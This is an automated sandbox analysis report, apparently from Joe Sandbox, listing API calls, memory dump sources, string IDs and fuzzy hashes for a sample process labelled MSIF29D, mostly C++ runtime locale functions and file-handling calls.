                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ced2b18ea3eb914d6193e01037a704f467bd13675c78b5855a7ee32b2a8c130d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C801617290021ADFCB16EFA4D942BAE7765AF84720F24440EE50067292CF789E02EB91
APIs
• __EH_prolog3.LIBCMT ref: 00FCEB33
• std::_Lockit::_Lockit.LIBCPMT ref: 00FCEB3D
  • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
  • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
• moneypunct.LIBCPMT ref: 00FCEB77
• std::_Facet_Register.LIBCPMT ref: 00FCEB8E
• std::_Lockit::~_Lockit.LIBCPMT ref: 00FCEBAE
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
APIs
• __EH_prolog3.LIBCMT ref: 00FC2B27
• std::_Lockit::_Lockit.LIBCPMT ref: 00FC2B31
  • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
  • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
• moneypunct.LIBCPMT ref: 00FC2B6B
• std::_Facet_Register.LIBCPMT ref: 00FC2B82
• std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2BA2
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
APIs
• __EH_prolog3.LIBCMT ref: 00FC2D7B
• std::_Lockit::_Lockit.LIBCPMT ref: 00FC2D85
  • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
  • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
• numpunct.LIBCPMT ref: 00FC2DBF
• std::_Facet_Register.LIBCPMT ref: 00FC2DD6
• std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2DF6
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
APIs
• EnterCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C58
• LeaveCriticalSection.KERNEL32(0100DD3C,?,?,00FB2427,0100E638,00FF6B40), ref: 00FD2C8B
• RtlWakeAllConditionVariable.NTDLL ref: 00FD2D02
• SetEvent.KERNEL32(?,00FB2427,0100E638,00FF6B40), ref: 00FD2D0C
• ResetEvent.KERNEL32(?,00FB2427,0100E638,00FF6B40), ref: 00FD2D18
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000018,8F6E4A30,?,00000000), ref: 00FBBBA3
                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00FBBD7F
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                                      • API String ID: 3924972193-2658103896
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FCD3D2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: __EH_prolog3.LIBCMT ref: 00FC2555
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00FC255F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC25D0
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FCD46E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                                      • String ID: %.0Lf$0123456789-
                                                                                                                                                                                                                                                                      • API String ID: 2544715827-3094241602
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FCD676
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8657
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8679
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB86A1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB880E
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FCD712
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                                      • String ID: 0123456789-$0123456789-
                                                                                                                                                                                                                                                                      • API String ID: 3042121994-2494171821
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FD1761
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92A0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92C2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB92EA
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB9422
                                                                                                                                                                                                                                                                      • _Find_elem.LIBCPMT ref: 00FD17FB
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                                      • String ID: 0123456789-$0123456789-
                                                                                                                                                                                                                                                                      • API String ID: 3042121994-2494171821
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC838D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocstr.LIBCPMT ref: 00FC1C62
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocstr.LIBCPMT ref: 00FC1C7F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocstr.LIBCPMT ref: 00FC1C9C
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocchr.LIBCPMT ref: 00FC1CAE
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1C42: _Maklocchr.LIBCPMT ref: 00FC1CC1
                                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 00FC841A
                                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 00FC8434
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                                      • API String ID: 2939335142-1686923651
                                                                                                                                                                                                                                                                      • Opcode ID: 91bfb7a5ecffb0a87523b0d08e8c9b5ea2ccfe762c473e62afabecbb5847f253
                                                                                                                                                                                                                                                                      • Instruction ID: f566e3fbaa278ce7ac90369a1b9231d55b1d662751afd48c4593baa1cd378bbf
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91bfb7a5ecffb0a87523b0d08e8c9b5ea2ccfe762c473e62afabecbb5847f253
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F21C1B1804B92AED725DF75C881B7BBEF8BB09300F04455EE099C7A42D734EA02DB90
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: Mpunct$H_prolog3
• String ID: $+xv
• API String ID: 4281374311-1686923651
• Opcode ID: 608336f44b67059ff46a5cfdec8d315d76d99c05cebe218581307f2eee5c7f27
• Instruction ID: e82f419901478b1e56f77af4d7055737e9370754012a48cee2f87416846773f3
• Opcode Fuzzy Hash: 608336f44b67059ff46a5cfdec8d315d76d99c05cebe218581307f2eee5c7f27
• Instruction Fuzzy Hash: B221C4B1804B926FD725DF758894B7BBEF9AB09301F08491EE099C7A42D774E601DB90
APIs
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FB1434,?,00000000), ref: 00FB2569
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FB1434,?,00000000), ref: 00FB2589
• LocalFree.KERNEL32(?,00FB1434,?,00000000), ref: 00FB25DF
• CloseHandle.KERNEL32(00000000,8F6E4A30,?,00000000,00FF3C40,000000FF,00000008,?,?,?,?,00FB1434,?,00000000), ref: 00FB2633
• LocalFree.KERNEL32(?,8F6E4A30,?,00000000,00FF3C40,000000FF,00000008,?,?,?,?,00FB1434), ref: 00FB2647
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: Local$AllocFree$CloseHandle
• String ID:
• API String ID: 1291444452-0
• Opcode ID: 5cf2149864f42028b0f557872210f94e6b50539098fc15c4407b3aac216076fd
• Instruction ID: 8c1faa17146175d8c2e25f34719ddb8d93d9cb5530ae264dd92422c08e8e5795
• Opcode Fuzzy Hash: 5cf2149864f42028b0f557872210f94e6b50539098fc15c4407b3aac216076fd
• Instruction Fuzzy Hash: 0B411B32A003159BC364AF29DC94BEAB7D9EF45360F14072AF526C72D0DB30D944EB50
APIs
• GetConsoleOutputCP.KERNEL32(8F6E4A30,?,00000000,?), ref: 00FF1DFE
  • Part of subcall function 00FEA9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FE6F5E,?,00000000,-00000008), ref: 00FEAA67
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FF2059
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FF20A1
• GetLastError.KERNEL32 ref: 00FF2144
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
• Opcode ID: 920b46321aeaae0512cdfae99e9d54bed0c8fea23a7c37f672ed0dd0d1c551b3
• Instruction ID: f105de05c473317c6a61e81ffc9ceb3f8730430d661f39599f195f5450927878
• Opcode Fuzzy Hash: 920b46321aeaae0512cdfae99e9d54bed0c8fea23a7c37f672ed0dd0d1c551b3
• Instruction Fuzzy Hash: 4ED167B6D002489FCB15CFA8D880AADBBB5FF09310F18452AEA55EB361DB30A941DB50
APIs
Memory Dump Source
• Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
Similarity
• API ID: _strcspn$H_prolog3_ctype
• String ID:
• API String ID: 838279627-0
• Opcode ID: 9617c0bc9ec3bfa49343535f7b9d1f4afd0ed7a80811105dbc55212f5b82acec
• Instruction ID: 91b9094f66b65b838c17283d071d22b15fe94ce18cbda61e9f59da7859e7c175
• Opcode Fuzzy Hash: 9617c0bc9ec3bfa49343535f7b9d1f4afd0ed7a80811105dbc55212f5b82acec
• Instruction Fuzzy Hash: 32B15CB5D0025ADFDF11DF94CA82EEEBBB5FF48350F148019E805AB251D734AA45EB60
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 838279627-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00FB6FB7
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                      • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                                                                                                                      • API String ID: 1452528299-1781106413
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,8F6E4A30), ref: 00FBCD1C
                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00FBCD3C
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00FBCD6D
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00FBCD86
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3604237281-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FBD7EE
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBD7F8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBD849
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD869
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC27A9
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC27B3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2804
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2824
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FBD759
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBD763
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBD7B4
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD7D4
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2714
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC271E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC276F
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC278F
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC28D3
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC28DD
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC292E
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC294E
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC283E
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2848
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2899
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC28B9
                                                                                                                                                                                                                                                                      Memory Dump Source
